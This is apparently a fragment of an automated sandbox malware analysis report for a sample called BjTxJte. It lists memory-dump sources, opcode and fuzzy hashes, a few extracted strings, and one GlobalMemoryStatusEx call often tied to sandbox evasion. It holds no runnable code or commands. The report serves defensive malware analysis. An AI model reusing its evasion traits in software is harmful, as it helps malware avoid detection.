                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1815 12fefd8-12ff054 GlobalMemoryStatusEx 1818 12ff05d-12ff085 1815->1818 1819 12ff056-12ff05c 1815->1819 1819->1818
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 012FF047
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4122198845.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_12f0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: 6c7889c6e6e5451dae5266ce457cee2df173f90c9dc7287711bef130c8b98875
                                                                                      • Instruction ID: 178365d1b0f3941231afff4a476eff7b467917ed4deed6ae8d32c227684dbb9a
                                                                                      • Opcode Fuzzy Hash: 6c7889c6e6e5451dae5266ce457cee2df173f90c9dc7287711bef130c8b98875
                                                                                      • Instruction Fuzzy Hash: A11144B1C00659DFCB10CF9AC5447EEFBF4AB48320F14822AE528B7294D378A940CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1822 12fefe0-12ff054 GlobalMemoryStatusEx 1824 12ff05d-12ff085 1822->1824 1825 12ff056-12ff05c 1822->1825 1825->1824
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 012FF047
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4122198845.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_12f0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: 97af1c444296d636a992967243274b59a0f987678593fffe29f9761d564eb155
                                                                                      • Instruction ID: 9890cdefcd1208f9540b98b2a6d7884de358eed60e8851e1308a20ab54961e0a
                                                                                      • Opcode Fuzzy Hash: 97af1c444296d636a992967243274b59a0f987678593fffe29f9761d564eb155
                                                                                      • Instruction Fuzzy Hash: C411F3B2C006599BCB10DF9AC544BDEFBF4AF48324F14816AD918A7254D378A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: ef849ba0a9eaa9c4abd58bb0f68a8d45683dff6b336a44802347117dc58bf66c
                                                                                      • Instruction ID: e702c96e8ddfd48c914bd9f886aac46b053775addeb2f10c6ff65ca1df010036
                                                                                      • Opcode Fuzzy Hash: ef849ba0a9eaa9c4abd58bb0f68a8d45683dff6b336a44802347117dc58bf66c
                                                                                      • Instruction Fuzzy Hash: AF418D30E1031A9FDB65DFA4C4546AEBFB2AF85300F108529E515EB384DB75E986CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: 59d972ea54a4de741307834faf743053a596f3120908c9136698c4e353516552
                                                                                      • Instruction ID: dab5b1b73473478cfd4a63f24501ef57f0f6d76847a137c5a1ef69e3b4461cec
                                                                                      • Opcode Fuzzy Hash: 59d972ea54a4de741307834faf743053a596f3120908c9136698c4e353516552
                                                                                      • Instruction Fuzzy Hash: 9D31EF30B102128FDB59AB74D46466EBBA2FF89300F204579D406DB394DF36DD86C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: bc79525f1a0fccb8decdd3d0184d776b418522d99dffcf4a159a020f81481984
                                                                                      • Instruction ID: b775bcefca08f1d8e58092c951dcda4b791c8d1d378aef37339ca6f19ef13b25
                                                                                      • Opcode Fuzzy Hash: bc79525f1a0fccb8decdd3d0184d776b418522d99dffcf4a159a020f81481984
                                                                                      • Instruction Fuzzy Hash: CB31EF30B102168FCB59AB74D46466EBAE2BB89300F208539D406DB398DE36DD86C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q
                                                                                      • API String ID: 0-388095546
                                                                                      • Opcode ID: b2f6edcc9ec4e1e7ac38f1be88ecb889fc3acb8d626d7e62860392c5370994c9
                                                                                      • Instruction ID: 36e8ea9ea07622469eef337c34c23d475879f9c83e71f243f4e3b99a675445a5
                                                                                      • Opcode Fuzzy Hash: b2f6edcc9ec4e1e7ac38f1be88ecb889fc3acb8d626d7e62860392c5370994c9
                                                                                      • Instruction Fuzzy Hash: 03F082B6E0423ADFDF649E50E8496BC77B4FF00714F194466C904D7254D33099CACB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \Ocq
                                                                                      • API String ID: 0-2995510325
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ebfe96e5b45a8460fda58f98edc70887aa4588ba9956e93a1995752b3bbcc39
                                                                                      • Instruction ID: 4c1119807a689c30b8923d034e7d3115820528df3180f0c1874cc96993ec45e1
                                                                                      • Opcode Fuzzy Hash: 4ebfe96e5b45a8460fda58f98edc70887aa4588ba9956e93a1995752b3bbcc39
                                                                                      • Instruction Fuzzy Hash: 36216871504244DFDF09DF98E5C4F2ABBA5FB94B34F20C669E8090B246C376D406CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eb65aaa8fdbbce7a4217284ae66264c2583db393e3fb61a917fcef695d3f2cfa
                                                                                      • Instruction ID: a1b2d8066d13067cd147f0211d11bb4059f05880c441c1134a00db87da532afe
                                                                                      • Opcode Fuzzy Hash: eb65aaa8fdbbce7a4217284ae66264c2583db393e3fb61a917fcef695d3f2cfa
                                                                                      • Instruction Fuzzy Hash: E201F170B101221FDB6496AEE81176EA7EBCBCE210F10843AE60AC7394DA61DC4383A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b63ffd2fe55b5859cca21f2bb7f063694c54da018f62a2c9884cfadac29750a1
                                                                                      • Instruction ID: 52e573503eca8832a720003cce1cdd4d3f241737376bb236e149378c56f6a1ac
                                                                                      • Opcode Fuzzy Hash: b63ffd2fe55b5859cca21f2bb7f063694c54da018f62a2c9884cfadac29750a1
                                                                                      • Instruction Fuzzy Hash: 6811C131E0022A5FCB698A7898115EEF7B1AB89304F0045BAD546E7300DA35CA81CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfaa74c73373f63e82d1a1c53d77b0c40dcacb0083749d2afbc4a96c2a103fda
                                                                                      • Instruction ID: ee7074ae2db366f4f4b4260236dccd9d1b00f37f02d61afb75cdee41d20a9499
                                                                                      • Opcode Fuzzy Hash: cfaa74c73373f63e82d1a1c53d77b0c40dcacb0083749d2afbc4a96c2a103fda
                                                                                      • Instruction Fuzzy Hash: 43012632B0402A1FDF95A678EC10AEF77EA9BC9704F04447AD10AD7340EA65984387A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e2a0515d0eec19aca8a64ff527043a97d8eb972f9833adca34b4d32d9dd3fd35
                                                                                      • Instruction ID: 1fef1ab5d5837d42583cef35138f312e4f3771a8ef409be6c61716300e3f5ab1
                                                                                      • Opcode Fuzzy Hash: e2a0515d0eec19aca8a64ff527043a97d8eb972f9833adca34b4d32d9dd3fd35
                                                                                      • Instruction Fuzzy Hash: E011A532B001295FDF94E678D8146AF73FAEBC8710B00853AD50AEB344DE35DC4287A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a6fe5fd507ba99f8ef129f50e042b3fef80af765912aaadad7576d01f8254f6a
                                                                                      • Instruction ID: a1cc02b1250d2d20a0473c47ba6204a542a5c0bcda383908be3ce992f65452e9
                                                                                      • Opcode Fuzzy Hash: a6fe5fd507ba99f8ef129f50e042b3fef80af765912aaadad7576d01f8254f6a
                                                                                      • Instruction Fuzzy Hash: 21014775B141214FCB26C67D985072FB7E6DBCB214F14846EE70ACB381DA21DC4383A6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 83ccd2fbf2a9b0d61dcbd06c2fd37cdb71e721843ed1fe74c0e4d3041a4cfd7c
                                                                                      • Instruction ID: c0fed9dec42f7cdd7ce8663351559b8f1222a0f0b71c468db5542f3e4a4f2c7d
                                                                                      • Opcode Fuzzy Hash: 83ccd2fbf2a9b0d61dcbd06c2fd37cdb71e721843ed1fe74c0e4d3041a4cfd7c
                                                                                      • Instruction Fuzzy Hash: 2221E3B1D01269AFCB00DF9AD884ACEFFB4FB49320F10812AE558B7210C374A544CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: 9cd658497f1124d00012502761982821c98aa4846968fb80c117d3fe59f8e9e2
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: D011D075504240CFDF06CF54E5C4B55BF61FB44714F28C6AAD8494B656C33AE40ACB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: 646b60f3ccf01c8585af501e250b154b58bf893a4021273e9710d24862e3fa4c
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: ED11BB75504284CFDF16CF64D9C4B16BFA2FB88714F24C6AED8494B252C33AD44ACB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                      • Instruction ID: 9bde9a155317350e19887b1b5227bc2f1b92f50a359be2f8dc5f18b169f3903d
                                                                                      • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                      • Instruction Fuzzy Hash: 3E11DD76504284CFDF06CF54E5C4B16BFA1FB84624F24C6AAD8490B646C33AD40ACBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c57d3dd654639c5b53b50f69d6914f3841f1624a3c2f0afaf33a399cb4bee4c
                                                                                      • Instruction ID: dcd67d250f9a99d901fec93d5eacfbc5db9b219d11a80cce8e0139315e8cdf59
                                                                                      • Opcode Fuzzy Hash: 7c57d3dd654639c5b53b50f69d6914f3841f1624a3c2f0afaf33a399cb4bee4c
                                                                                      • Instruction Fuzzy Hash: 3F01D431B141221FDB65E679D85471EBBD6EF8B214F14C46EE20ACB351DA21EC428391
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c273fe4af046ec62122be21c99fcb8296f3111a8c0a949844d21ac2be905ab72
                                                                                      • Instruction ID: cf03c3a7a662260576104ad22b93dcff476bb2b45e16b66dfe6791f349250695
                                                                                      • Opcode Fuzzy Hash: c273fe4af046ec62122be21c99fcb8296f3111a8c0a949844d21ac2be905ab72
                                                                                      • Instruction Fuzzy Hash: 6C11B3B5D01259AFCB00DF9AD884ADEFFB4FB49314F10852AE518B7240C375A954CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2f529f9edb0d46081e57edf62f594fb1bef874455b856ac9de7afde81f1898b
                                                                                      • Instruction ID: ba345e5af33593fa19cf05e76ed48e5be34034cac4c63965dd2e02179b3cbcfa
                                                                                      • Opcode Fuzzy Hash: b2f529f9edb0d46081e57edf62f594fb1bef874455b856ac9de7afde81f1898b
                                                                                      • Instruction Fuzzy Hash: D1016D71B200221BDB6496AEE45471FA2DBDBC9614F208439E60EC7344DEA1DC4243A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 874228f9f37e22371d92a1796af14f03079c29113f1a7dea0a3707a5c6d725cf
                                                                                      • Instruction ID: 95abef9f2bae6edd13ec91a6d4976d4df61f4f36da4e64571dbc9087cb5c176e
                                                                                      • Opcode Fuzzy Hash: 874228f9f37e22371d92a1796af14f03079c29113f1a7dea0a3707a5c6d725cf
                                                                                      • Instruction Fuzzy Hash: 3A01A475B101215BCB65967DE85472F62EAE7CE614F10843DE70BC7344DE21DC438395
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0ec6a14a3ad1de0820b882541f16cb0baaec8cee22f5d4ad099c162284df0e6f
                                                                                      • Instruction ID: 3b61944f75be0189441f58dc116ee95721be54bbe41f830c2447ac73351b660c
                                                                                      • Opcode Fuzzy Hash: 0ec6a14a3ad1de0820b882541f16cb0baaec8cee22f5d4ad099c162284df0e6f
                                                                                      • Instruction Fuzzy Hash: F001A431B101221FDB68EA6DE85471EB7DAEF8A714F508439E60ECB354EE21EC424385
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 393dc19c96131451f9fdc5a7feb91e3baa1c1095dc9e8746ee36aa84fc7b4bae
                                                                                      • Instruction ID: fa38a09ffe0a8dddf11cab3fc40a1d1caf1793582c3bbe71581bfdac5786a4f0
                                                                                      Execution Graph

                                                                                      Execution Coverage:6.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:20
